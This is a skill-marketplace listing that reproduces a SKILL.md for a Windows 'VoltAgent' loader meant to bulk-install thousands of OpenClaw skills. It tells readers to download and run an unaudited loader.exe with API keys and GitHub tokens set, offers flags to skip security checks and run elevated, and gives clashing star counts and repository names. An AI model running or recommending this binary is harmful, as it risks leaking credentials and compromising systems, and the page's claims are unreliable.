Skip to main content

voltagent-openclaw-skill-loader

Fully automatic OpenClaw skill manager that installs, updates, and launches 5200+ community skills from ClawHub with zero manual configuration

Zur Installation springen

Quellinformationen

Repository
reason-machines/hermes-skills
Letzte Quellaktivität
25. Mai 2026 um 01:43
Erkannte Sprache von SKILL.md
Englisch
Sterne
5
Forks
0

Installationsoptionen

Standardmäßig ist der Prompt ausgewählt, der zuerst die Quelle prüft. Sie können zu einem direkten Befehl wechseln oder eine lokale Kopie herunterladen.

Quelldateien prüfen

Lesen Sie SKILL.md und alle von SkillsMP angezeigten Begleitdateien, bevor Sie sich für eine Installation entscheiden.

SKILL.md wird angezeigt

SKILL.md
Quellanweisungen · Schreibgeschützte Vorschau
name
voltagent-openclaw-skill-loader
description
Fully automatic OpenClaw skill manager that installs, updates, and launches 5200+ community skills from ClawHub with zero manual configuration
triggers
["install openclaw skills automatically","set up voltagent skill loader","manage openclaw skills with voltagent","automatically install clawhub skills","configure openclaw skill management","run voltagent loader for openclaw","bulk install openclaw community skills","automate openclaw skill deployment"]
# VoltAgent OpenClaw Skill Loader > Skill by [ara.so](https://ara.so) — Hermes Skills collection. VoltAgent is a fully automatic OpenClaw skill management tool for Windows that eliminates manual installation, configuration, and deployment of AI agent skills. It downloads, configures, and launches 5200+ curated community skills from the ClawHub registry without requiring any manual commands or copy-pasting. ## What VoltAgent Does - **Automatic Installation**: Downloads and installs OpenClaw skills from ClawHub registry - **Environment Setup**: Configures dependencies, API keys, and configuration files - **Version Management**: Handles updates and resolves conflicts automatically - **Security Scanning**: Checks skills via VirusTotal and scans for malicious patterns - **Smart Filtering**: Excludes spam, duplicates, low-quality, and malicious skills (7,215+ filtered out) - **Category-Based Installation**: Install skills by category (Git, Coding, Browser Automation, etc.) - **Launch Automation**: Starts your agent with optimal parameters after setup ## Installation ### Download and Run 1. Download `loader.exe` from the [releases page](https://github.com/voltagent/awesome-voltagent/releases) 2. Double-click or run in terminal: ```cmd loader.exe ``` 3. Wait for "All done" message — your agent is now running with all necessary skills ### First Run Configuration VoltAgent will automatically: - Check for OpenClaw installation (installs if missing) - Prompt for required API keys (stored in environment variables) - Pull latest skill versions from selected categories - Configure and launch your agent ## Key Commands ### Basic Usage ```cmd # Run with default settings (installs all recommended skills) loader.exe # Install skills from specific category loader.exe --category "Git & GitHub" # Search and install specific skills loader.exe --search "browser automation" # Smart installation based on project analysis loader.exe --smart # Update existing skills loader.exe --update # List available categories loader.exe --list-categories # Show installed skills loader.exe --list-installed ``` ### Category-Based Installation ```cmd # Install all Git & GitHub skills (167 skills) loader.exe --category "Git & GitHub" # Install coding agent and IDE skills (1184 skills) loader.exe --category "Coding Agents & IDEs" # Install browser automation skills (323 skills) loader.exe --category "Browser & Automation" # Install multiple categories loader.exe --category "DevOps & Cloud" --category "Web & Frontend Development" ``` ### Advanced Options ```cmd # Run in sandbox mode for testing loader.exe --sandbox # Skip security checks (not recommended) loader.exe --no-security-check # Install specific skill by name loader.exe --skill "agent-commons" # Backup current configuration before installation loader.exe --backup # Restore from backup loader.exe --restore # Verbose logging loader.exe --verbose # Dry run (show what would be installed) loader.exe --dry-run ``` ## Configuration ### Environment Variables VoltAgent uses environment variables for API keys and configuration. Set these before running: ```cmd # OpenAI API key (required for most AI skills) set OPENAI_API_KEY=%YOUR_API_KEY% # Anthropic API key (for Claude-based skills) set ANTHROPIC_API_KEY=%YOUR_API_KEY% # GitHub token (for Git & GitHub skills) set GITHUB_TOKEN=%YOUR_TOKEN% # ClawHub registry URL (optional, uses default if not set) set CLAWHUB_REGISTRY_URL=https://registry.clawhub.io # Installation directory (optional) set VOLTAGENT_INSTALL_DIR=C:\VoltAgent ``` ### Configuration File Create `voltagent.config.json` in the same directory as `loader.exe`: ```json { "autoUpdate": true, "securityCheck": true, "sandboxMode": false, "categories": [ "Git & GitHub", "Coding Agents & IDEs", "Browser & Automation" ], "excludeSkills": [ "crypto-trader", "blockchain-analyzer" ], "proxy": { "enabled": false, "url": "http://proxy.example.com:8080" }, "backup": { "enabled": true, "path": "C:\\VoltAgent\\backups", "maxBackups": 5 } } ``` ## Real-World Usage Examples ### Example 1: Setting Up Git Automation Agent ```cmd # Install all Git & GitHub skills loader.exe --category "Git & GitHub" # VoltAgent automatically installs: # - agent-commons (automatic change management) # - auto-pr-merger (automatic PR creation and merging) # - arc-skill-gitops (automatic skill deployment via Git) # ... and 164 more skills ``` After installation, your agent can: - Automatically create and merge PRs - Manage branches and commits - Deploy skills via GitOps workflows ### Example 2: Browser Automation Workflow ```cmd # Install browser automation skills loader.exe --category "Browser & Automation" # Configure browser automation set BROWSER_HEADLESS=false set BROWSER_TIMEOUT=30000 # Run with specific browser automation skills loader.exe --search "puppeteer selenium playwright" ``` Skills installed enable: - Web scraping and data extraction - Automated form filling - E2E testing automation - Screenshot and PDF generation ### Example 3: Full Development Environment Setup ```cmd # Install multiple categories for complete dev environment loader.exe --category "Coding Agents & IDEs" ^ --category "DevOps & Cloud" ^ --category "Web & Frontend Development" ^ --category "Git & GitHub" # Enable automatic updates loader.exe --update --auto # Run in smart mode to optimize for current project loader.exe --smart ``` ### Example 4: Secure Skill Testing ```cmd # Test new skills in sandbox before production loader.exe --sandbox --skill "new-experimental-skill" # If safe, install to production loader.exe --skill "new-experimental-skill" # Create backup before bulk installation loader.exe --backup loader.exe --category "AI & LLMs" --category "Data & Analytics" # Restore if issues occur loader.exe --restore ``` ## Available Skill Categories - **Git & GitHub** (167 skills) - Version control, PR automation, GitOps - **Coding Agents & IDEs** (1184 skills) - Development tools, code generation - **Browser & Automation** (323 skills) - Web automation, scraping, testing - **Web & Frontend Development** (919 skills) - React, Vue, Angular, frontend tools - **DevOps & Cloud** (393 skills) - AWS, Azure, GCP, Kubernetes, Docker - **Image & Video Generation** (170 skills) - Media creation and manipulation - **AI & LLMs** (176 skills) - LLM integration, prompt engineering - **Marketing & Sales** (103 skills) - CRM, email, social media automation - **Productivity & Tasks** (205 skills) - Task management, calendars, notes - **Data & Analytics** (28 skills) - Data processing, visualization, ML - **Security & Passwords** (54 skills) - Auth, encryption, password management ## Security Best Practices ### Built-in Security Features VoltAgent automatically: 1. Scans skills with VirusTotal API 2. Checks for code injection patterns 3. Verifies skill signatures and checksums 4. Filters known malicious skills (373+ blocked) 5. Optionally runs installations in sandbox ### Additional Security Tools ```cmd # Use with Snyk Skill Security Scanner loader.exe --security-scanner snyk # Enable strict mode (rejects any unverified skill) loader.exe --strict-mode # Audit installed skills loader.exe --audit ``` ### Recommended Practices 1. Always keep VoltAgent updated 2. Review skill descriptions before installation 3. Use environment variables for secrets (never hardcode) 4. Enable automatic security scans 5. Create backups before bulk installations 6. Test new skills in sandbox mode first ## Troubleshooting ### Common Issues **"OpenClaw not found"** ```cmd # VoltAgent will automatically install OpenClaw # If manual installation needed: # Download from https://openclaw.io/download # Or let VoltAgent handle it: loader.exe --install-openclaw ``` **"API key missing"** ```cmd # Set required API keys set OPENAI_API_KEY=%YOUR_KEY% loader.exe ``` **"Skill installation failed"** ```cmd # Try verbose mode to see detailed error loader.exe --verbose --skill "problem-skill" # Clear cache and retry loader.exe --clear-cache loader.exe --skill "problem-skill" ``` **"Permission denied"** ```cmd # Run as administrator # Right-click loader.exe -> Run as administrator # Or use elevated command prompt loader.exe --elevated ``` **"Port already in use"** ```cmd # Change default port set VOLTAGENT_PORT=8081 loader.exe ``` ### Getting Help ```cmd # Show help and all available commands loader.exe --help # Check version loader.exe --version # Generate diagnostic report loader.exe --diagnostics > diagnostics.txt ``` ### Logs and Debugging Logs are stored in `%APPDATA%\VoltAgent\logs\`: ```cmd # View latest log type %APPDATA%\VoltAgent\logs\latest.log # Enable debug logging set VOLTAGENT_LOG_LEVEL=debug loader.exe --verbose ``` ## Integration with AI Agents VoltAgent is designed to work with AI coding agents like Claude Code, Cursor, and Codex: ```python # Example: Using VoltAgent in Python automation script import subprocess import os # Set API keys os.environ['OPENAI_API_KEY'] = os.getenv('OPENAI_API_KEY') # Run VoltAgent to install skills subprocess.run([ 'loader.exe', '--category', 'Coding Agents & IDEs', '--smart', '--verbose' ]) # Your agent now has access to 1184+ coding skills ``` ## Community and Support - Discord: https://s.voltagent.dev/discord - GitHub Issues: https://github.com/voltagent/awesome-voltagent/issues - Documentation: https://voltagent.ai/ ## Important Notes - **Windows Only**: VoltAgent currently only supports Windows - **Not Official**: VoltAgent is not an official OpenClaw product - **Use at Own Risk**: Skills are curated, not fully audited - **No License**: Repository has no explicit license information - **Active Development**: Project is actively maintained (24 stars, 1 star/day)
Auf GitHub ansehen